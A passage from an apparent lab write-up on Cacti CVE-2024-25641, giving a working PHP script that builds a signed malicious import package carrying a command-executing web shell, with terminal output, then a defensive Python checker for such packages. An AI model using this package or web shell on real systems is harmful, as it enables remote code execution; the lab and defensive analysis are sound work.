Malicious Package
Following the same structure as the [[MonitorsThree_CVE-2024-25641#Exploit ([PoC](https //github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88))|original PoC]]:
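```php
<?php
// Package layout: one <file> entry (name, base64 data, per-file signature),
// plus the signer's public key and a signature over the whole document.
$xmldata = "<xml>
<files>
<file>
<name>resource/CVE-2024-25641.php</name>
<data>%s</data>
<filesignature>%s</filesignature>
</file>
</files>
<publickey>%s</publickey>
<signature></signature>
</xml>";
// File contents carried by the package (the web shell mentioned below).
$filedata = '<?php system($_GET["cmd"]); ?>';
// Freshly generated key pair; its public half is embedded in the package itself.
$keypair = openssl_pkey_new();
$public_key = openssl_pkey_get_details($keypair)["key"];
// Sign the file contents, fill in the template, then sign the whole document.
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
// Insert the document signature and write the gzip-compressed package.
file_put_contents("CVE-2024-25641.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat CVE-2024-25641.xml | gzip -9 > CVE-2024-25641.xml.gz; rm CVE-2024-25641.xml");
?>
```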
The [[MonitorsThree_CVE-2024-25641#Exploit ([PoC](https //github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88))|original PoC]] has been modified to include a web shell.
```
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ php CVE-2024-25641.php
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ ll CVE-2024-25641.xml.gz
4.0K -rw-rw-r-- 1 kali kali 1.2K Aug 25 19:02 CVE-2024-25641.xml.gz
```
The malicious package has been successfully generated.
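
The PoC signs with a freshly generated key and embeds the matching public key in the package, so a signature check against the embedded key says nothing about who built it. As an added example (not part of the original notes or of Cacti's code), this Python check triages a package in the layout above before import; the size cap, the pinned-fingerprint set, the flag names and the sample values are assumptions made for illustration.

```python
import base64, gzip, hashlib, io
import xml.etree.ElementTree as ET

MAX_XML = 8 * 1024 * 1024  # assumed cap on decompressed size

def triage_package(gz_bytes, pinned_key_sha256):
    """Return (signer_fingerprint, findings) for a package in the layout above."""
    with gzip.GzipFile(fileobj=io.BytesIO(gz_bytes)) as fh:
        raw = fh.read(MAX_XML + 1)
    if len(raw) > MAX_XML:
        raise ValueError("decompressed package exceeds size cap")
    if b"<!DOCTYPE" in raw or b"<!ENTITY" in raw:
        raise ValueError("unexpected DTD or entity declaration")
    root = ET.fromstring(raw)
    findings = []
    # The key travels inside the package, so compare it with keys pinned out of band.
    key = base64.b64decode(root.findtext("publickey") or "")
    fingerprint = hashlib.sha256(key).hexdigest()
    if fingerprint not in pinned_key_sha256:
        findings.append(("package", "signer-key-not-pinned"))
    for node in root.iter("file"):
        name = (node.findtext("name") or "").strip()
        data = base64.b64decode(node.findtext("data") or "")
        parts = name.replace("\\", "/").split("/")
        if name.startswith("/") or ".." in parts:
            findings.append((name, "path-escapes-package-root"))
        # Illustrative policy: PHP is flagged for review by name or by content.
        if name.lower().endswith((".php", ".phtml", ".phar")) or b"<?php" in data.lower():
            findings.append((name, "php-content"))
    return fingerprint, findings

def build_sample():
    """Constructed sample: harmless placeholder file, throwaway 'key' bytes."""
    b64 = lambda b: base64.b64encode(b).decode()
    xml = ("<xml><files><file><name>resource/example.php</name>"
           f"<data>{b64(b'<?php /* placeholder */ ?>')}</data>"
           "<filesignature></filesignature></file></files>"
           f"<publickey>{b64(b'CONSTRUCTED-KEY')}</publickey>"
           "<signature></signature></xml>")
    return gzip.compress(xml.encode())

if __name__ == "__main__":
    print(triage_package(build_sample(), pinned_key_sha256=set()))
```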